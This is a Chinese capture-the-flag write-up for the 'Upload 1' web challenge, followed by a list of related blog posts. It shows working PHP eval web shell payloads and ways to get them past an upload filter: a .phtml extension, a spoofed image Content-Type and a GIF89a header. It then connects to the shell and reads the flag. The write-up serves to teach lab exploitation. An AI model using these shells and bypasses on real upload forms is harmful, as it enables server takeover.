[极客大挑战 2019]Upload 1

题目环境:

根据题目和环境可知此题目是一道文件上传漏洞

编写一句话木马脚本
<?php @eval($_POST['shell']);?>

将脚本文件更改为jpg图片文件

我这里是flag.jpg


上传文件并burpsuite抓包

Repeater重放

报错一句话木马里面有<?字符

换一种一句话木马

继续编写木马脚本
<script language="php">@eval($_POST['shell']);</script>

保存为flag.phtml文件

绕过后缀的有文件格式有php,php3,php4,php5,phtml.pht

因为前几个都被过滤了,所以选择使用phtml后缀

上传抓包

修改为image/jpeg图片格式

Repeater重放Send

不是图片

通过GIF89a进行绕过
GIF89a<script language="php">@eval($_POST['shell']);</script>

使文件为动态GIF文件绕过检测

访问upload/flag.phtml文件

上传成功

复制URL链接

使用中国蚁剑连接

在/根目录下找到flag文件

访问flag文件


得到flag:
flag{5359382e-ae88-42a8-8116-8c85a02fb21f}

相关推荐
这里有鱼汤2 分钟前
给你的DeepSeek装上实时行情,让他帮你炒股
后端·python·mcp
weixin_472339462 分钟前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
满分观察网友z4 分钟前
别小看这个滑动条!从性能灾难到用户挚爱的 uni-app Slider 踩坑实录
前端
咖啡啡不加糖4 分钟前
暴力破解漏洞与命令执行漏洞
java·后端·web安全
weixin_472339465 分钟前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
满分观察网友z7 分钟前
别再裸写<textarea>了!一个“小”功能,我用上了它几乎所有API
前端
风象南7 分钟前
SpringBoot敏感配置项加密与解密实战
java·spring boot·后端
西西木科技丨Shopify开发机构12 分钟前
如何在 Shopify 中建立重定向
前端·html
Clownseven18 分钟前
Shell 脚本实战指南:内网 ARP 洪泛监控与飞书/邮件自动告警
网络·php·飞书
汪子熙19 分钟前
深入探析 header facets:定位与应用
前端·javascript